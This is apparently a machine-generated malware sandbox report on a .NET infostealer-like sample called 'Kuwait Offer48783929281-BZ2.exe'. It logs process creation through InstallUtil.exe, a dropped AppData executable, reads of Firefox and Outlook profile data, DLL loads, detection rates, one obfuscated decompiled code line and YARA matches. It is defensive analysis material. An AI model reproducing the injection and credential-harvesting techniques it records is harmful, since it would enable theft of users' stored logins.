                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Kuwait Offer48783929281-BZ2.exe, ReversingLabs: Detection: 34%
                    Source: Kuwait Offer48783929281-BZ2.exe, Virustotal: Detection: 27%
                    Source: Kuwait Offer48783929281-BZ2.exe, String found in binary or memory: -Start from the license
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, File read: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe
                    Source: unknown, Process created: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe "C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe"
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknown, Process created: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe "C:\Users\user\AppData\Roaming\Hxfzsthbd.exe"
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknown, Process created: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe "C:\Users\user\AppData\Roaming\Hxfzsthbd.exe"
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: version.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Section loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wtsapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: winsta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Kuwait Offer48783929281-BZ2.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Kuwait Offer48783929281-BZ2.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000034B9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000003015000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000034B9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000003015000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, BOT85cX15ubIHapB5PR.cs .Net Code: Type.GetTypeFromHandle(nkhBLYZ5DmmAefrjLUi.xrXjFrFO06(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(nkhBLYZ5DmmAefrjLUi.xrXjFrFO06(16777259)),Type.GetTypeFromHandle(nkhBLYZ5DmmAefrjLUi.xrXjFrFO06(16777263))})
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, ListDecorator.cs .Net Code: Read
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                    Source: Yara match File source: 0.2.Kuwait Offer48783929281-BZ2.exe.6440000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.Hxfzsthbd.exe.38bcc40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1366255411.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
